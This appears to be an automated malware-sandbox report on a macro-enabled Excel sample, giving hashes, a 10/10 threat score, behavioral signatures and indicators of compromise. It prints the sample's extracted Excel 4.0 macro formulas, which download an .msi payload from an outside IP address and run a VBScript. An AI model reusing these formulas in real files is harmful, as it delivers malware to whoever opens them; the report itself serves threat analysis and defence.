General
-
Target
5096fae40bc6b58c09e0c7d419df54e4
-
Size
6KB
-
Sample
231222-cnqwasfedq
-
MD5
5096fae40bc6b58c09e0c7d419df54e4
-
SHA1
5f03b300397160d18a2365ccf85e05c098e42abe
-
SHA256
f80c5aa7fb0aaf4dc8e8dc11e59e04dfe2e5e81b127fdc4958d4724c769c6bbb
-
SHA512
513cb7afeedb28f9b6f432f433a9aa68f50d2719d1bca9bc7bdba1603cc1f296f47bc3ae1475e3a610ebbaad87978ea999fa049adcddfc44ea266bb7de52cb4c
-
SSDEEP
192:NDSluSDbrA2OmmfRu8UhHFBFYuob98yxrlr4orrJIrTrWr7+yrrOrurVrrprwri:NuuoM2wY1FYpb98yxrlr4orrJIrTrWr9
Static task
static1
Behavioral task
behavioral1
Sample
5096fae40bc6b58c09e0c7d419df54e4.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
5096fae40bc6b58c09e0c7d419df54e4.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
5096fae40bc6b58c09e0c7d419df54e4
-
Size
6KB
-
MD5
5096fae40bc6b58c09e0c7d419df54e4
-
SHA1
5f03b300397160d18a2365ccf85e05c098e42abe
-
SHA256
f80c5aa7fb0aaf4dc8e8dc11e59e04dfe2e5e81b127fdc4958d4724c769c6bbb
-
SHA512
513cb7afeedb28f9b6f432f433a9aa68f50d2719d1bca9bc7bdba1603cc1f296f47bc3ae1475e3a610ebbaad87978ea999fa049adcddfc44ea266bb7de52cb4c
-
SSDEEP
192:NDSluSDbrA2OmmfRu8UhHFBFYuob98yxrlr4orrJIrTrWr7+yrrOrurVrrprwri:NuuoM2wY1FYpb98yxrlr4orrJIrTrWr9
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-